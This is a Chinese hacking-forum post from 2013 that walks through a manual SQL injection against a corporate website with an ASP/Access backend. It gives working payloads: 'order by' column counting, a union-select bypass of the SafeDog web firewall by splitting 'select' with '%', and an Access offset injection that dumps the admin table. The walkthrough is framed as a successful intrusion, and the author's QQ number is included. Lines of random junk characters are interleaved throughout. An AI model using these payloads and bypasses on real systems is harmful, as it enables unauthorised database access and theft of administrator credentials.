中国网络渗透测试联盟
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
[打印本页]
作者:
admin
时间:
2013-3-8 21:49
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。
3 ~, i q3 [, p' [ a8 M1 T
/ d9 D, C* C3 ^. ? l
6 P- G! ~" S: x W& G. V' F" ^& v8 r
顺手加个admin
" [# \# G, E3 b* p+ z1 l) b
3 ]( J1 t+ D* _3 K8 O
- h0 y1 J" ^/ {6 K( {6 O
默认后台。
2 E0 r/ a( w( X+ h- b5 C) w. D( y
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
5 ]% M! C8 T# `2 k
0 S$ O$ z" G1 q' b
7 j4 e( C- v9 v2 v* c
2 r/ G1 \+ V* t3 F
所以就不用御剑扫了,待会直接封IP。
6 }' Z9 u4 h* _- P6 [6 T6 ~
( \8 c& \ f6 E, ]/ m! @2 ?0 x
用order by语句判断是否存在注入。
0 j! G0 ^- p( R
http://www.xxx.com
/product_show.asp?id=997 order by 1
4 b4 J4 B7 V4 L( z' O: s$ T4 C
http://www.xxx.com
/product_show.asp?id=997 order by 100
, [6 X+ g% n0 X m: J% h$ y
现在存在注入,经测试后发现是9个字段。
: C' p5 T, K) D7 V) |
7 e0 j$ @+ X8 C' n9 ^
接下来进行联合查询,猜是否存在admin表。
8 J& ^0 L+ a7 T+ [0 g
http://www.xxx.com
/product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
% u, r- w5 ]/ Y& k7 K t6 f6 p/ }
3 \' A5 x7 y& a0 Q. W
% y( J" b& n/ D0 O4 Q" B3 a1 W
; b" F/ U8 r8 R8 k6 I. [% a
在select中间加个%,se%lect绕过安全狗。
2 h6 b/ D2 ~3 s
: U& O$ k) j, T9 ?
/ {7 s: p) [; K% V5 {5 M, S
发现存在admin表,然后开始手工猜常用的字段。
6 @: K2 S2 ]+ h9 g# g. I( X8 S' U
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
* V, J8 S5 Q$ [
/ A: F Q- B0 G8 h$ {/ v
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
; p/ o- u3 D% h P" R5 t5 P
! _* l0 W0 {+ m- }
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
& c8 \4 ]2 W5 A" Z' K _; Q& m5 p. L
http://www.xxx.com
/product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
! u3 G7 k7 Z: a% {$ A
好了,敏感内容出显了。
5 `$ \1 m* V; b# F3 ^
) ^" E( N9 U I1 x" ~; x- J3 j
" F) d8 V( S3 X C" i7 M
* [# B- R; y/ k( R) g+ D
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2